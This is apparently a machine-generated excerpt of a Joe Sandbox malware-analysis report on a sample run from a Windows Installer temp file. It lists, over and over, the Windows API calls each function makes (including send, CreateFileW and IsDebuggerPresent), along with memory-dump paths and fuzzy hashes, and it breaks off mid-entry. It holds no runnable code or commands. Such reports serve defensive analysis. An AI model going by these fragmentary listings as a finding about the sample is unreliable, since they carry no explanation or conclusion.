                                        APIs
                                        • IsWindow.USER32(00000000), ref: 007EDB31
                                        • IsWindow.USER32(00000000), ref: 007EDB6B
                                          • Part of subcall function 00771F04: GetForegroundWindow.USER32 ref: 00771FBE
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$Foreground
                                        • String ID:
                                        • API String ID: 62970417-0
                                        • Opcode ID: e2a0d3514dd63c353227ea2bfe606fdec6e3db06894e01a174d80081563e7cab
                                        • Instruction ID: 5b5cce813ac2a293b757ea8ef9b6ae0900116d61fa3507b3e1ac86a53643a1cc
                                        • Opcode Fuzzy Hash: e2a0d3514dd63c353227ea2bfe606fdec6e3db06894e01a174d80081563e7cab
                                        • Instruction Fuzzy Hash: D821C0B2200246AADF20AB35C855BFE77AA9F443C5F008429F95ED6141EBB8ED02D760
                                        APIs
                                          • Part of subcall function 0077193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00771952
                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 007AE344
                                        • _strlen.LIBCMT ref: 007AE34F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout_strlen
                                        • String ID:
                                        • API String ID: 2777139624-0
                                        • Opcode ID: 3c97624477f454b8fd9caa165c109a2bf73afa9e99ba10d432acdd697009119c
                                        • Instruction ID: 180dabb16a21eb1e3c59f004d6e02b06e545d44e376884167ba8fa4bd80fd27d
                                        • Opcode Fuzzy Hash: 3c97624477f454b8fd9caa165c109a2bf73afa9e99ba10d432acdd697009119c
                                        • Instruction Fuzzy Hash: 6911CD31200205E7DF05BB68DCDADBF7BA99F86340B10453DF60ADB192DE6C9C4587A0
                                        APIs
                                        • 74A3C8D0.UXTHEME ref: 007736E6
                                          • Part of subcall function 00792025: __lock.LIBCMT ref: 0079202B
                                          • Part of subcall function 007732DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 007732F6
                                          • Part of subcall function 007732DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0077330B
                                          • Part of subcall function 0077374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0077376D
                                          • Part of subcall function 0077374E: IsDebuggerPresent.KERNEL32(?,?), ref: 0077377F
                                          • Part of subcall function 0077374E: GetFullPathNameW.KERNEL32(C:\Windows\Installer\MSI77F6.tmp,00000104,?,00831120,C:\Windows\Installer\MSI77F6.tmp,00831124,?,?), ref: 007737EE
                                          • Part of subcall function 0077374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00773860
                                        • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00773726
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                        • String ID:
                                        • API String ID: 3809921791-0
                                        • Opcode ID: e7f2312c05d80a8a6d9191c4fb0390a8e2481613b9c111c7838866ee694a084c
                                        • Instruction ID: b06c743c2dab0d29bef8024f03f047eed2bb06d502ed7b6279de9fb94fd55b3e
                                        • Opcode Fuzzy Hash: e7f2312c05d80a8a6d9191c4fb0390a8e2481613b9c111c7838866ee694a084c
                                        • Instruction Fuzzy Hash: EC115EB1948341DFC714EF29D84991ABBE8FBC4750F008A1EF444872B2DB789A55CF92
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00774C2B,?,?,?,?,0077BE63), ref: 00774BB6
                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00774C2B,?,?,?,?,0077BE63), ref: 007E4972
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: c7f26ec100ffb2e59341e1998c012bc96ba25f04e1ed5ed73fe7cef9b84ec256
                                        • Instruction ID: e178e16bb969aecd4a037cdd5e0d4754e3c7557a6bebe7a366adc5c6cb905d7c
                                        • Opcode Fuzzy Hash: c7f26ec100ffb2e59341e1998c012bc96ba25f04e1ed5ed73fe7cef9b84ec256
                                        • Instruction Fuzzy Hash: 290184B0144308BEF7344E148C8AF6637DCAB057A8F10C315BAE86A1E0C7B85C44CB14
                                        APIs
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,007BAEA5,?,?,00000000,00000008), ref: 0078F282
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,007BAEA5,?,?,00000000,00000008), ref: 0078F2A6
                                          • Part of subcall function 0078F2D0: _memmove.LIBCMT ref: 0078F307
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$_memmove
                                        • String ID:
                                        • API String ID: 3033907384-0
                                        • Opcode ID: a112db3d49e8ca6027839328fa3af83fc695d87f0a733e7afdc0f20037f7f2d7
                                        • Instruction ID: cd2247ad45aaf486d4556ff961e851b882f471e076651a41dfcb5ffefe35bd48
                                        • Opcode Fuzzy Hash: a112db3d49e8ca6027839328fa3af83fc695d87f0a733e7afdc0f20037f7f2d7
                                        • Instruction Fuzzy Hash: 88F0ECB6554118BFAB11AF65AC48CBF7BAEEF8A3607508026FD08CA111DA39DD40C7B5
                                        APIs
                                        • ___lock_fhandle.LIBCMT ref: 0079F7D9
                                        • __close_nolock.LIBCMT ref: 0079F7F2
                                          • Part of subcall function 0079886A: __getptd_noexit.LIBCMT ref: 0079886A
                                          • Part of subcall function 0079889E: __getptd_noexit.LIBCMT ref: 0079889E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                        • String ID:
                                        • API String ID: 1046115767-0
                                        • Opcode ID: 483182df9091f46e352b3d79f7b07aed92728b12b400be269020d4fbf722ef48
                                        • Instruction ID: 16a0e4c6b10a47b47b4984600f15d852f2b289b7af7f17e22eb02c97cba2f0fa
                                        • Opcode Fuzzy Hash: 483182df9091f46e352b3d79f7b07aed92728b12b400be269020d4fbf722ef48
                                        • Instruction Fuzzy Hash: 5011C632815610DEDF517FA4B84AB587A506F42331F660650E4249F1E3CBBC990086A2
                                        APIs
                                        • send.WS2_32(00000000,?,00000000,00000000), ref: 007C9534
                                        • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 007C9557
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorLastsend
                                        • String ID:
                                        • API String ID: 1802528911-0
                                        • Opcode ID: ab608465e5e9faca639ec8210663ba696b894752c02c7664093038820e435141
                                        • Instruction ID: 87f123bac6537019c8842cfba4c05e312ffc198afab78c3a50a8d6c2b07970e7
                                        • Opcode Fuzzy Hash: ab608465e5e9faca639ec8210663ba696b894752c02c7664093038820e435141
                                        • Instruction Fuzzy Hash: 230121353002009FD710EF28D859F6AB7E9EB99721F10851DE65A87391CA78EC05CB51
                                        APIs
                                          • Part of subcall function 0079889E: __getptd_noexit.LIBCMT ref: 0079889E
                                        • __lock_file.LIBCMT ref: 007942B9
                                          • Part of subcall function 00795A9F: __lock.LIBCMT ref: 00795AC2
                                        • __fclose_nolock.LIBCMT ref: 007942C4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                        • String ID:
                                        • API String ID: 2800547568-0
                                        • Opcode ID: 33d081e9204dc0c3a184d78a4cd57bd6a252a9201895277d53dcfbd9e70cfc0e
                                        • Instruction ID: 94b532a5419d17b353e5bf1fd09344c6cfe53a36d9b92c5ade3b039936c6e0b0
                                        • Opcode Fuzzy Hash: 33d081e9204dc0c3a184d78a4cd57bd6a252a9201895277d53dcfbd9e70cfc0e
                                        • Instruction Fuzzy Hash: 95F0B432811715DADF21AB75B80AF5E6BE0BF41334F218209B8249B1C1CB7C99029B55
                                        APIs
                                        • timeGetTime.WINMM ref: 0078F57A
                                          • Part of subcall function 0077E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0077E279
                                        • Sleep.KERNEL32(00000000), ref: 007E75D3
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessagePeekSleepTimetime
                                        • String ID:
                                        • API String ID: 1792118007-0
                                        • Opcode ID: 9ff108e5880ecd0c6c1f429045967cedaa1374bbd1e33638600cb330ede01e11
                                        • Instruction ID: a183a893481eab2a8bc659cb17363684c40d9981bd528ade5e80cd60a20ccbf5
                                        • Opcode Fuzzy Hash: 9ff108e5880ecd0c6c1f429045967cedaa1374bbd1e33638600cb330ede01e11
                                        • Instruction Fuzzy Hash: 1EF08C71240218AFD324EF79D409BA6BBE9AF49360F00802AF91DC7251DB74AC10CBD1
                                        APIs
                                          • Part of subcall function 007784A6: __swprintf.LIBCMT ref: 007784E5
                                          • Part of subcall function 007784A6: __itow.LIBCMT ref: 00778519
                                        • __wcsnicmp.LIBCMT ref: 007783C4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __itow__swprintf__wcsnicmp
                                        • String ID:
                                        • API String ID: 712828618-0
                                        • Opcode ID: 644cb6cfc36239dde98e496c7c38761c236fa2d777c94794c5dffbcf05f0f947
                                        • Instruction ID: bc9b763ca57f4c5b5b940fb1ce5deb5ace318aac403737c305de24f49c83d0b0
                                        • Opcode Fuzzy Hash: 644cb6cfc36239dde98e496c7c38761c236fa2d777c94794c5dffbcf05f0f947
                                        • Instruction Fuzzy Hash: DAF16C71508342EFCB04EF18C89586EBBE5FF98354F54891DF98997222DB38E905CB52
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                        • Instruction ID: 31892802eb3c9efded63af61b420d5bc4c25a088f0426092550c2cb4aa7bcd69
                                        • Opcode Fuzzy Hash: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                        • Instruction Fuzzy Hash: 6761A170A4020ADFCB14EF54C888A7AF7E5FF18310F108269E915CB691E779ED95CB91
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1ab3293332864ad2f8f677855b868bbc014380518b242d4bcae615635a5d6874
                                        • Instruction ID: c1ffa5d590458b1b4694e8cb5168baf33e1453d99eb7cf9793a87e95eaff07cc
                                        • Opcode Fuzzy Hash: 1ab3293332864ad2f8f677855b868bbc014380518b242d4bcae615635a5d6874
                                        • Instruction Fuzzy Hash: D7518175600214EFCF14FF68C999EAD77A9AF49390B148069F50A9B393DB38ED01D750
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                        • Instruction ID: 5d43f7aecc4d9f003d0785d87308621384a33637e5e76920124800f3b123ec7d
                                        • Opcode Fuzzy Hash: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                        • Instruction Fuzzy Hash: 7D417B79200602DFCB28DF19D491A62F7F0FF893A1714C46AE99E8B751D734E862CB90
                                        APIs
                                        • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00774F8F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: d723e349efbf28bffc0d5ed41372fcf9288cddaf9048a21fa766069dd6b4f40e
                                        • Instruction ID: f81b3286e4ec2e22c6483f77bee73100ad27272f1f2858ec83ae40f9aa2de7f7
                                        • Opcode Fuzzy Hash: d723e349efbf28bffc0d5ed41372fcf9288cddaf9048a21fa766069dd6b4f40e
                                        • Instruction Fuzzy Hash: C7314A31A00656EFCF18CF6DC484AADB7B5BF48350F18C629E81993710D778B990CB90
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: select
                                        • String ID:
                                        • API String ID: 1274211008-0
                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction ID: bb6318223da0362e2c337507949e38b78de287586c9fa35ef7feffc337501ae7
                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction Fuzzy Hash: AD31E670A44106EBC718EF58D484A69FBA5FF49310B24C2A5E449CB255D739EDC1CBD0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        • Opcode ID: 877c00c123fa2fe20e5c31693af5422860a8d4b67370274d94947031361a7747
                                        • Instruction ID: c35c41ddd1a8f92a2b30b953e4257e2e4c8e8b74d712f268c3b0fb1b5fc9a245
                                        • Opcode Fuzzy Hash: 877c00c123fa2fe20e5c31693af5422860a8d4b67370274d94947031361a7747
                                        • Instruction Fuzzy Hash: 64415A74544641CFEB24DF14C488B1ABBE1BF49308F1985ACE9994B362C379F885CF92
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: b501c3ab4b2fc9d96f5d5c2d5969ddedd85c14cbfe8d6392e0bbe34b327b9a08
                                        • Instruction ID: df35b579c3254656686feb991bbcf11e570d36134ed429b54b659e2f2a3651cc
                                        • Opcode Fuzzy Hash: b501c3ab4b2fc9d96f5d5c2d5969ddedd85c14cbfe8d6392e0bbe34b327b9a08
                                        • Instruction Fuzzy Hash: C221E470A00608FBCF249F52EC4566E7BF8FB5A390F21C46DE48AC5111EB3895E0DB95
                                        APIs
                                        Memory Dump Source
